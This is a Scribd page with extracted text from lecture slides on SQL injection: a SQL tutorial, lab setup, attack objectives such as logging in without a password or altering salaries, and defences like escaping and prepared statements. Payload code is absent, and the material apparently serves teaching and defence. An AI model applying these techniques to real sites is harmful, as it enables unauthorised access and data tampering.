Scribd Logo
Upload

Welcome to Scribd!

  • 1.2 SQL-slides

    Uploaded by

    Heo Quay
    9 views42 pages
    This document discusses SQL injection attacks. It begins with an outline of topics to be covered, including a tutorial on SQL and databases, SQL injection attacks, similarities to other attacks, and countermeasures. It then provides a tutorial on SQL and databases, demonstrating queries, updates, and comments. Next, it describes how SQL injection attacks work by exploiting vulnerabilities in web applications. Examples are given of attacks that log in without a password, modify salaries, and run arbitrary SQL statements. Finally, it discusses countermeasures like encoding special characters, prepared statements, and turning code into data to prevent SQL injection attacks.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses SQL injection attacks. It begins with an outline of topics to be covered, including a tutorial on SQL and databases, SQL injection attacks, similarities to other attacks, and countermeasures. It then provides a tutorial on SQL and databases, demonstrating queries, updates, and comments. Next, it describes how SQL injection attacks work by exploiting vulnerabilities in web applications. Examples are given of attacks that log in without a password, modify salaries, and run arbitrary SQL statements. Finally, it discusses countermeasures like encoding special characters, prepared statements, and turning code into data to prevent SQL injection attacks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    9 views42 pages

    1.2 SQL-slides

    Uploaded by

    Heo Quay
    This document discusses SQL injection attacks. It begins with an outline of topics to be covered, including a tutorial on SQL and databases, SQL injection attacks, similarities to other attacks, and countermeasures. It then provides a tutorial on SQL and databases, demonstrating queries, updates, and comments. Next, it describes how SQL injection attacks work by exploiting vulnerabilities in web applications. Examples are given of attacks that log in without a password, modify salaries, and run arbitrary SQL statements. Finally, it discusses countermeasures like encoding special characters, prepared statements, and turning code into data to prevent SQL injection attacks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 42

    SQL Injection

    Attack

    SQL-slides Page 1
    Outline

    ❖ Tutorial on SQL and Database


    ❖ SQL Injection Attack
    ❖ Similarity with Other Attacks
    ❖ Countermeasures (Prepared Statement)

    ❖ Reading: Chapter 12
    ❖ Lab: SQL Injection Attack Lab

    SQL-slides Page 2
    Web Application Architecture

    Browser Web Application Server Database

    SQL-slides Page 3
    Lab Setup
    The Labsetup/ Folder

    Target website: www.seed-server.com

    Add the following to /etc/hosts

    SQL-slides Page 4
    End

    SQL-slides Page 5
    Tutorial on SQL
    and Database

    SQL-slides Page 6
    The Database Container
    ❖ The Database's Dockerfile

    ❖ The docker-compose.yml file

    SQL-slides Page 7
    Database Setup
    ❖ Log into MySQL
    # mysql -u root -pdees
    mysql>

    ❖ Display all the databases


    SHOW DATABASES;

    ❖ Create a database

    ❖ Create a table

    SQL-slides Page 8
    ❖ Insert records

    SQL-slides Page 9
    Query Database
    ❖ SELECT statement

    USE test_db
    SELECT * FROM mytable;

    SELECT Name, Salary FROM mytable;

    ❖ Conditions: WHERE clause

    SELECT * FROM mytable WHERE Name='Alice';

    SQL-slides Page 10
    SELECT * FROM mytable WHERE Name='Alice' OR Salary>8000;

    ❖ A special condition
    SELECT * FROM mytable WHERE 1=1;

    SQL-slides Page 11
    Update Records
    ❖ The UPDATE statement

    UPDATE mytable SET Salary=9999 WHERE Name='Alice';

    SQL-slides Page 12
    Comments
    ❖ Comments in SQL statement

    SQL-slides Page 13
    End

    SQL-slides Page 14
    SQL Injection
    Attack

    SQL-slides Page 15
    How Web Application Interacts with Database
    Browser

    Application Server

    Database

    SQL-slides Page 16
    Logging In Without Password 1
    ❖ Attack objective
    Can you log into Alice's account without knowing her password?

    ❖ SQL statement

    SQL-slides Page 17
    Logging In Without Password 2
    ❖ Attack objective
    You don't know any name, can you log into the database?

    ❖ SQL Statement

    SQL-slides Page 18
    End

    SQL-slides Page 19
    Modify Database

    SQL-slides Page 20
    Change Your Own Salary
    ❖ Attack objective
    You are not happy with the salary that you get. You want to change your own salary?

    ❖ Profile-Change form and the SQL statement

    SQL-slides Page 21
    Change Your Own Salary
    ❖ Attack objective
    Your boss (Ted) did not increase your salary, you want to punish him
    by changing his salary to $1.

    ❖ Profile-Change form and the SQL statement

    SQL-slides Page 22
    Run an Arbitrary SQL Statement
    ❖ Attack objective
    Use SQL injection vulnerability to run an arbitrary SQL statement?

    ❖ SQL Statement

    SQL-slides Page 23
    SQL Injection Comic Strip

    (Source: https://xkcd.com/327/)

    SQL-slides Page 24
    End

    SQL-slides Page 25
    Similarity with
    Other
    Vulnerabilities

    SQL-slides Page 26
    SQL Injection and Cross-Site Scripting
    ❖ SQL Injection

    ❖ Cross-Site Scripting (JavaScript Injection)

    SQL-slides Page 27
    Similarity with system()
    ❖ Vulnerability in using system() function (Shell Script Injection)

    SQL-slides Page 28
    End

    SQL-slides Page 29
    Countermeasures

    SQL-slides Page 30
    Turning Code Into Data
    Encoding Special Characters

    ❖ Apache's configuration

    "magic_quotes_gpc = On" in php.ini

    ❖ PHP's solution: mysqli::real_escape_string()

    SQL-slides Page 31
    Solving the Fundamental Problem
    ❖ Defense against the attacks on system()

    ❖ Defense against the XSS attack

    SQL-slides Page 32
    Prepared Statements
    ❖ Motivation behind prepared statements

    SELECT * FROM mytable WHERE name='Alice' OR age>20;


    SELECT * FROM mytable WHERE name='Bob' OR age>30;
    SELECT * FROM mytable WHERE name='Charlie' OR age>40;

    ❖ Using prepared statements

    SQL-slides Page 33
    SQL-slides Page 34
    Defense Using Prepared Statement
    ❖ The vulnerable approach

    ❖ Using prepared statement

    SQL-slides Page 35
    SQL-slides Page 36
    End

    SQL-slides Page 37
    Review Questions
    and Summary

    SQL-slides Page 38
    Review Question 1

    SQL-slides Page 39
    Review Question 2

    SQL-slides Page 40
    Summary
    ❖ SQL statement

    ❖ SQL injection

    ❖ Countermeasures

    SQL-slides Page 41
    End

    SQL-slides Page 42

    You might also like